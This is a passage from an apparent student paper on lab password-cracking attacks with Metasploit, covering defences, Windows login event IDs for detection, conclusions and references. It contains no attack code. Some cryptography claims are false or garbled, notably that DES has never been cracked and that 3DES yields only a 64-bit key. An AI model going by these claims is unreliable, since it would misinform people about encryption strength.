This parameter tells the exploit to finish after the first successful login. We found that this parameter when used with a library attack for multiple usernames actually harms the exploit as it stops the exploit after the first successful pair. The benefit of using this parameter in a single username attack is it prevents Metasploit from running through every password after the successful one, since there is only one password per account.

Defense and DetectionCryptography

12

The shortcomings of the DES were addressed by 3DES. The improvements included running the encryption three times with two or three different keys. However, the 3DES takes a long time, and still only produces a 64-bit key length. It is not a terribly insecure length. It’s just easy to increase the encryption key bit size. However, the DES has never been cracked. The advanced encryption standard can take a key size of up 256 bits. The biggest vulnerability to password is human error and cryptanalysis. Cryptographic tools are used by attackers as well. Fortunately, it is much easier to create a hash than it is to reverse a hash. It is also easier to create a new hash through a function than it is to try to duplicate a hash through a hash function. In other words, it would be like trying to find an exact copy of the planet earth in the universe. The best defense against an offline dictionary attack are controls to limit who can access the shadow file, intrusion detection, and assigning new passwords as soon as a password is compromised. If an attacker is trying to hack a specific account such as yahoo, the best defense would be to only allow only five password attempts to get into a user’s account for a given section. The password attack against a single user is very threatening because of the information usually known by the attacker. So having a strong password policy will thwart most of these types of attacks. Since the user is using a non-dictionary words, symbols, and multiple cases, the password will be more difficult to crack. The benefit is that even if the attacker knows the victim as well as family member, the password is random, so it has nothing to do with the victim. Workstation hijacking is also very effective, but including automatic logout after a set interval of time without activity will protect against form workstation hijacking. The popular password attacker is simply an attacker trying popular passwords against a wide range of user IDs. To defend against, this, common passwords must be prohibited in the password policy. The admin could also monitor the IP address to ensure one IP address is not attempting to access multiple user IDs. User mistakes will always be a factor, so training the employees by making them aware of popular attacks like phishing attacks is very effective. Employees should also be taught to never use the same password twice. As for electronic monitoring, where an attacker eavesdrop on a system, hashing the password is the best method. Otherwise, even if you send an encrypted password online, it can still be intercepted and decrypted. If you hash the password, the chances of the attacker un-hashing is virtually impossible.

Defenses against Brute Force and Dictionary/Library AttackLog Files

The log files found on a computer are a relatively simplistic way to view if your computer has been accessed by another individual. To do this on the windows machine, we clicked on the windows button, and then typed into the search bar, event logs. This opened up a new window as seen in (appendix, figure 14). The figure represents the logs on a machine that we hacked, specifically the highlighted areas show the successful login and logout that were made by our password cracking software.

In effect, if these were our machines, we would see that another individual other than ourselves logged in. The other benefit to these logs are that they show the time the login was made. Which would be useful in detecting the time the system was hacked. When combined with at defense instance such as Security Onion, we could effectively generate a report to aid in the reporting of these incidents to superiors or authorities.

Unfortunately, throughout our research projects’ duration we ran into technical difficulties faced by all teams and are unable to provide the Security Onion reporting data. The error that was faced was unable to be resolved, even though the Security Onion was online and configured to the correct specifications required. Had we been able to review the logs within Security Onion we would have been able to look at all systematic logs for the entirety of our network. All that would have been need is to filter through the logs looking for “special login” or “logoff” occurring moments after the “login” occurred. This could have been accomplished by aimlessly scouring the logs or by enacting filters using the ID’s associated with each login or logoff type. Special login being 4672, login being 4624, and logoff being 4634. This showed how using filters expedites the process of log viewing, enabling us to find the data required faster therefore, reducing the resources being used.

13

Conclusion and Future Implications Due to the universal implementation of passwords as the default form of authentication for systems, they are the most popular target for attackers. In this paper we have discussed multiple events where attackers have stolen passwords, as well as reported on our findings after having implemented similar attacks in our test environment. We discovered that conducting these attacks is relatively easy, although time consuming and largely dependent on the hardware and network being used. This is frightening and confirms that the threat against people's passwords is very real. As such we suggest individuals adapt at least an eight character password made up of multiple symbols, upper and lowercase alphabet characters, and numbers. If this is taken to heart the next time a password is created, the user will be relatively safe from dictionary attacks. However, the threat posed by brute force attacks still exist but is unlikely to be successful without the use of a supercomputer.

While working on this paper we did face a time constraint when it came to the execution and implementation of our system and attack methods. We also were faced with the difficulty of conducting this attack in an environment that does not accurately reflect a real life scenario. In the future, we wish to conduct this research over the course of a year and in an environment that more accurately represents the way a large network of multiple users create and handle their passwords. This would allow us to produce better results and ideally more successful attempts at password cracking attack types.

14

Appendix:

Figure 2

15

Figure 1

Figure 3

u

Figure 4

Figure 5

16

Figure 6

Figure 7

17

Figure 8

Figure 9

Figure 10

18

Figure 11

19

Figure 12

20

Figure 13

Success into Yi’s machine

21

Figure 14

Yi’s Logs

22

Figure 15

Targeting range of IP addresses

23

Figure 16

^using password list

24

Figure 17

Running Metasploit

25

Figure 18

Access to Sean’s Machine

26

Figure 19

File location

27

Figure 20

Files Inside

Figure 21

Command to Execute

28

References

British Airways among latest breaches. (2015). Network Security, 2015(4), 2-20.

Ganesan, R. (2016). Stepping up security with password management control. Network Security, 2016(2), 18-19.

Goodin, D. (2016, February 15). Password cracking attacks on Bitcoin wallets net £71,000. Retrieved February 25, 2016, from http://arstechnica.co.uk/security/2016/02/password-cracking-attacks-on-bitcoin-wallets-net-103000/

"john the ripper" open source password cracker offers increased speed through 17 percent improvement in gate count for data encryption standard (DES) algorithm. (2011). Benzinga.Com

Mansfield-Devine, S. (2015). The Ashley Madison affair. Network Security, 2015(9), 8-16. Retrieved February 24, 2016.

More battles over encryption & surveillance. (2016). Network Security, 2016(1),

Sykes, E.R., Lin, M., &Skoczen, W. (2010). MPI Enhancements in John the Ripper. J, Physc.: Conf. Ser. Journal of Physics: Conference Series, 256, 012024

29